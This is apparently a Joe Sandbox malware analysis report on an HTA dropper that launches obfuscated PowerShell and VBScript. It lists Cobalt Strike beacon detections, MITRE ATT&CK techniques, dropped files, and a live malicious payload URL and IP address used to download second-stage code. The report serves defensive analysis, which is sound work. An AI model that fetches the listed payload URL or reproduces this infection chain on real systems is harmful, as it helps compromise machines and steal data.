            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting            		Valid Accounts12
            Command and Scripting Interpreter            		111
            Scripting            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		21
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager21
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545195 Sample: greatthingswithmegood.hta Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 46 drive.google.com 2->46 48 198.187.3.20.in-addr.arpa 2->48 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 14 other signatures 2->68 10 mshta.exe 1 2->10         started        signatures3 process4 signatures5 70 Detected Cobalt Strike Beacon 10->70 72 Suspicious powershell command line found 10->72 13 powershell.exe 3 39 10->13         started        process6 dnsIp7 50 198.46.178.151, 49704, 80 AS-COLOCROSSINGUS United States 13->50 40 seemethebestthings...reatneedswithgo.vbs, Unicode 13->40 dropped 42 C:\Users\user\AppData\...\ly0yjdqb.cmdline, Unicode 13->42 dropped 80 Detected Cobalt Strike Beacon 13->80 82 Suspicious powershell command line found 13->82 84 Obfuscated command line found 13->84 86 Found suspicious powershell code related to unpacking or dynamic code loading 13->86 18 wscript.exe 1 13->18         started        21 powershell.exe 21 13->21         started        23 csc.exe 3 13->23         started        26 conhost.exe 13->26         started        file8 signatures9 process10 file11 52 Detected Cobalt Strike Beacon 18->52 54 Suspicious powershell command line found 18->54 56 Wscript starts Powershell (via cmd or directly) 18->56 60 3 other signatures 18->60 28 powershell.exe 7 18->28         started        58 Loading BitLocker PowerShell Module 21->58 38 C:\Users\user\AppData\Local\...\ly0yjdqb.dll, PE32 23->38 dropped 31 cvtres.exe 1 23->31         started        signatures12 process13 signatures14 74 Detected Cobalt Strike Beacon 28->74 76 Suspicious powershell command line found 28->76 78 Obfuscated command line found 28->78 33 powershell.exe 15 15 28->33         started        36 conhost.exe 28->36         started        process15 dnsIp16 44 drive.google.com 142.250.185.206, 443, 49705 GOOGLEUS United States 33->44

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            greatthingswithmegood.hta21%ReversingLabsScript-JS.Trojan.Acsogenixx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://go.micros0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.185.206
            		truefalse
              		unknown
              198.187.3.20.in-addr.arpa
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://drive.usercontent.googleXb2powershell.exe, 00000009.00000002.2203278305.00000000051C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2228919107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2100753552.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.micropowershell.exe, 00000001.00000002.2233257801.000000000730A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2212418076.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2098893857.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.000000000482A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 00000001.00000002.2212418076.0000000004CBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF&powershell.exe, 00000001.00000002.2233257801.0000000007289000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://crl.micMtpowershell.exe, 00000003.00000002.2102346402.0000000007724000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2228919107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2100753552.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://drive.google.compowershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://drive.usercontent.google.compowershell.exe, 00000009.00000002.2203278305.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFb.2lpowershell.exe, 00000001.00000002.2233257801.000000000734C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2212418076.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2098893857.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.0000000004856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://go.microspowershell.exe, 00000003.00000002.2098893857.00000000057A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.185.206
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  198.46.178.151
                                  		unknownUnited States
                                  		36352AS-COLOCROSSINGUStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1545195
                                  Start date and time:2024-10-30 08:23:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 52s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:13
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:greatthingswithmegood.hta
                                  Detection:MAL
                                  Classification:mal100.phis.expl.evad.winHTA@17/19@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 39
                                  • Number of non-executed functions: 13
                                  Cookbook Comments:
                                  • Found application associated with file extension: .hta

                                  Warnings

                                  • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target mshta.exe, PID 5836 because there are no executed function
                                  • Execution Graph export aborted for target powershell.exe, PID 6004 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 6512 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 6516 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7136 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: greatthingswithmegood.hta

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:24:03API Interceptor81x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  198.46.178.151PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                  • 198.46.178.151/66/LLORG.txt
                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                  • 198.46.178.151/65/SMPLLLK.txt

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AS-COLOCROSSINGUSOrden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 192.3.220.20
                                  PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                  • 198.46.178.151
                                  Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 192.3.220.20
                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                  • 192.3.101.8
                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                  • 198.46.178.151
                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                  • 192.3.101.8
                                  SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                  • 172.245.26.231
                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                  • 192.3.101.8
                                  Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 192.3.220.20
                                  ORDEN7873097067.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 172.245.185.139

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                  • 142.250.185.206
                                  Reff_Yazaki-europe_575810710108_ZnjKTIejsM.htmlGet hashmaliciousUnknownBrowse
                                  • 142.250.185.206
                                  ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 142.250.185.206
                                  File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 142.250.185.206
                                  Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 142.250.185.206
                                  Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 142.250.185.206
                                  Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 142.250.185.206
                                  Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 142.250.185.206
                                  Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 142.250.185.206
                                  Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 142.250.185.206

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemethebestthingswithgreatneedswithgoodformewith[1].tiff

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):141910
                                  Entropy (8bit):3.6703425717520406
                                  Encrypted:false
                                  SSDEEP:1536:eirfggt5pzOGwjqSxVj51Dis9CifP9+z0xG11E6SMWxJRX:eir4gt5pKGwDzjbDislfl+nKMYJRX
                                  MD5:64CC9748329C0E186CACD10D639615E6
                                  SHA1:1291F245B185BD05FB09646B79F284D76E7DC0FF
                                  SHA-256:2C5FFFA8231F572E3A34B8D4CA675AEC062C3ACCFE661519A28E376605C0479D
                                  SHA-512:65CCBFE0223B58675AEF7DE997229F3BA66BE892C851D6CEC9018B941F3A5C5CAC3C41FBE1878474213293AD25059B06E7FF7F0C4E3320D75A6FA7F071B646BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.n.t.r.o.v.i.s.c.a.d.a.)..... . . . .d.i.m. .p.e.l.o.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.e.l.o.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.e.l.o.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.773832331134527
                                  Encrypted:false
                                  SSDEEP:3:NlllulT:NllUT
                                  MD5:E4180F2A99AF5E89EFF73EF2920866EE
                                  SHA1:425764A503E242B67DC594D867128B590A073BF2
                                  SHA-256:8990863C31480474500ADEC8447DA648262A073E3AAE580D07FF60F353C08D08
                                  SHA-512:EC6BE616E8DEE9CD51B001D43C45E3C162C1F2875E9B4820CE4735B49F1C1D5D7C88A1D721517F630914E3E85F592DE06369504A92C84B9FB45706C7C611C9A5
                                  Malicious:false
                                  Preview:@...e...................................G.......................

                                  C:\Users\user\AppData\Local\Temp\RES2C04.tmp

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Oct 30 08:53:37 2024, 1st section name ".debug$S"
                                  Category:dropped
                                  Size (bytes):1336
                                  Entropy (8bit):3.983626510300286
                                  Encrypted:false
                                  SSDEEP:24:HHm9pKgWH7WwKTFexmfwI+ycuZhNLakStPNnqSSd:SKFb1KTAxmo1ulLa33qSC
                                  MD5:741DBF9A29F09D4F8E2CF900EC41CF41
                                  SHA1:7DE18BFBE07BEC2FD4CE86DB3F0AB23CFCC98AB5
                                  SHA-256:7CA4B1A29E6B144CEEC272FD21A8B44AE0A1A2F09DC57DD9CF9563FE33BB7C3E
                                  SHA-512:F32C57DB6D0B4095F5CE87A2F2AA6645859EA688E2895ACB0E47B5CE4DF6770C56DB7C072D9DA0DAA52EAA02B65A28E2E025BBD5D22D8C81E5FAF0ABF0F099CF
                                  Malicious:false
                                  Preview:L.....!g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP........................2e.?P..~..........5.......C:\Users\user\AppData\Local\Temp\RES2C04.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.y.0.y.j.d.q.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3naoor5k.5yp.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uedb00j.rtm.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iobkwo4.heg.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ew0gpcgm.twz.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivn5hzdv.akk.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3lnxuof.jm1.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nixedkto.5sj.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
